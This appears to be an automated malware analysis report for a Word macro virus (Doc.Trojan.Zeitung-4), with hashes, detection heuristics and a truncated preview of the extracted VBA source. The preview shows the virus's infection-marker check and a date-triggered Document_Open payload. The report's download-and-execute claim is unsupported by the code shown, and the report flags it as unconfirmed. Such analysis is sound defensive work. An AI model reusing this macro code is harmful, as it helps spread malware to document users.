Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 df1f61939850fb12…

MALICIOUS

Office (OLE)

70.5 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7074fc60829c8d81427a5efd57db9f5e SHA-1: f604691d6852d0f5476564b6a8a546261655e923 SHA-256: df1f61939850fb12aae7046bb7f09017e1130fddabc79fcde46550c90984930f
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

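The sample is a malicious OLE document containing VBA macros, specifically a Document_Open macro designed to execute automatically. The ClamAV detection 'Doc.Trojan.Zeitung-4' and the presence of the 'VirusZeitung' signature within the VBA code suggest a trojanized document. The macro's logic appears to be designed to download and execute a secondary payload, although the exact mechanism is obfuscated and truncated. Note that the script preview below is cut off, and its visible part contains no network or process-execution calls. It shows a marker check (Kontaminat) for the 'VirusZeitung' string, references to the first VBA component of the Normal template and of the active document, and a routine that always runs on eight fixed calendar dates (otherwise with roughly 5% probability) and types text into a newly created document. The download-and-execute assessment should therefore be treated as unconfirmed until the full macros.bas has been reviewed.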

Heuristics 3

  • ClamAV: Doc.Trojan.Zeitung-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Zeitung-4
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 97037 bytes
SHA-256: a0d2af9a2f9ab30e5abd8882387300d9c6e0f0c017175aa006900e15c44b7ce8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const Signature = "VirusZeitung" ' virus signature (translated from the CP1251 Russian comment); Kontaminat searches code modules for this string
'èó îäë:ÀêäéÔíðâêé ëêàä ôåî  èàëØòëâ@Âðññçàè ðàè èàåñè,ÀåñíðÅðìâèÌõè ààî
'2
' issue no. 2 for the year 2000 (translated from the CP1251 Russian comment)
' NOTE(review): the long comment directly below the Const line does not decode to readable
' CP1251 text, so it is left exactly as extracted.
' NOTE(review): the '2 line is kept byte-identical because Kontaminat reads line 3 of a code
' module as a number; presumably this is that line - confirm against the full module.
Dim sd, reg As Boolean ' only reg is typed Boolean; sd has no As clause and is therefore a Variant
' Kontaminat: marker check on a VBA component.
' Reports whether the code module of component O carries the Signature string and, if so,
' which number is stored on its third line.
'
' Parameter:
'   O - untyped; used only through O.codemodule, so presumably a VBComponent - confirm against callers.
' Returns:
'   0        when Signature is not found in the search window, or the module has fewer than 50 lines
'   n        the numeric value of line 3 (first character dropped) when that value is below 65535
'   -1       when that value is 65535 or more
' Analyst note: the callers are outside the visible preview, so how the result is used
' (for example as a version comparison) cannot be confirmed from here.
Private Function Kontaminat(O)
 ' CodeModule.Find arguments are (target, startline, startcolumn, endline, endcolumn):
 ' only line 1 col 1 through line 100 col 100 is searched for the marker.
 If Not O.codemodule.Find(Signature, 1, 1, 100, 100) Then
  Kontaminat = 0
 Else
  ' A module with the marker but under 50 lines is reported the same as one with no marker.
  If O.codemodule.countoflines < 50 Then
   Kontaminat = 0
  Else
   ' Read module line 3, then drop its first character before converting to a number
   ' (presumably the leading apostrophe of a comment such as '2 - confirm).
   Ant$ = Trim(O.codemodule.lines(3, 1))
   Ant$ = Trim(Mid(Ant$, 2, Len(Ant$) - 1))
   If Val(Ant$) < 65535 Then
    Kontaminat = Val(Ant$)
   Else
    ' Out-of-range number: reported as -1 rather than as a value.
    Kontaminat = -1
   End If
 End If
 End If
End Function
Private Sub Document_Open()
 On Error Resume Next
 Dim ad, nt As Object
 Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
 Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
 If Mid(ActiveDocument.Name, 1, 12) = "Àäñêèé îãîíü" Then
  Exit Sub
 End If
 reg = False
 p = 0.05
 Tag$ = ""
 Monat$ = ""
 datum$ = Trim(Date)
 i = 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Tag$ = Tag$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 i = i + 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Monat$ = Monat$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 If (Val(Monat$) = 2) And (Val(Tag$) = 2) Then p = 2 ' 2  ôåâðàëÿ
 If (Val(Monat$) = 3) And (Val(Tag$) = 21) Then p = 2 ' 21 ìàðòà
 If (Val(Monat$) = 4) And (Val(Tag$) = 30) Then p = 2 ' 30 àïðåëÿ
 If (Val(Monat$) = 6) And (Val(Tag$) = 21) Then p = 2 ' 21 èþíÿ
 If (Val(Monat$) = 8) And (Val(Tag$) = 2) Then p = 2 ' 2  àâãóñòà
 If (Val(Monat$) = 9) And (Val(Tag$) = 21) Then p = 2 ' 21 ñåíòÿáðÿ
 If (Val(Monat$) = 10) And (Val(Tag$) = 31) Then p = 2 ' 31 îêòÿáðÿ
 If (Val(Monat$) = 12) And (Val(Tag$) = 21) Then p = 2 ' 21 äåêàáðÿ
 If Rnd >= p Then
  Exit Sub
 End If
 Documents.Add Template:="Normal", NewTemplate:=False
 With ActiveDocument.PageSetup
      .LineNumbering.Active = False
      .Orientation = wdOrientPortrait
      .TopMargin = CentimetersToPoints(1.5)
      .BottomMargin = CentimetersToPoints(1.5)
      .LeftMargin = CentimetersToPoints(2.5)
      .RightMargin = CentimetersToPoints(2)
      .Gutter = CentimetersToPoints(0)
      .HeaderDistance = CentimetersToPoints(1.25)
      .FooterDistance = CentimetersToPoints(1.25)
      .PageWidth = CentimetersToPoints(21)
      .PageHeight = CentimetersToPoints(29.7)
      .FirstPageTray = wdPrinterDefaultBin
      .OtherPagesTray = wdPrinterDefaultBin
      .SectionStart = wdSectionNewPage
      .OddAndEvenPagesHeaderFooter = False
      .DifferentFirstPageHeaderFooter = False
      .VerticalAlignment = wdAlignVerticalTop
      .SuppressEndnotes = False
      .MirrorMargins = False
 End With
 Druck_0 "À Ä Ñ Ê È É   Î Ã Î Í Ü", 40, True, wdAlignParagraphCenter, 0, False
 Druck_0 "Âèðóñíàÿ ãàçåòà ñåêòû èì. Äæ. Äè è Ý. Êåëëè.", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "Âûõîä ïî ìåðå êîìïëåêòîâàíèÿ íîìåðà", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "10 ìàÿ  2000  ã.   ¹ 2 (2)", 18, False, wdAlignParagraphLeft, 0, True
 Selection.TypeParagraph
 Druck_0 "Ñåãîäíÿ â íîìåðå:", 18, True, wdAlignParagraphLeft, 0, True
 Druck_0 "* Ìíåíèÿ ÷èòàòåëåé î ãàçåòå. (Ïîäáîðêà èíòåðâüþ)", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "* Ïðåäëîæåíèÿ ïî óëó÷øåíèþ ðàáîòû ãàçåòû:", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** Ìû ñîâåðøåíñòâóåì ñâîé âèðóñ.", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** Íàñèëüíî ìèë íå áóäåøü.", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** Ñâîé âèðóñ - ñâîèìè ðóêàìè. ", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** Ìû - âàì, âû - íàì (î ïðîáëåìàõ îáðàòíîé ñâÿçè). ", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "* Íàøè ïëàíû.", 18, False, wdAlignParagraphLeft, 0, True
 Selection.TypeParagraph
 Druck_0 "******************************", 18, True, wdAlignParagraphCenter, 0,
... (truncated)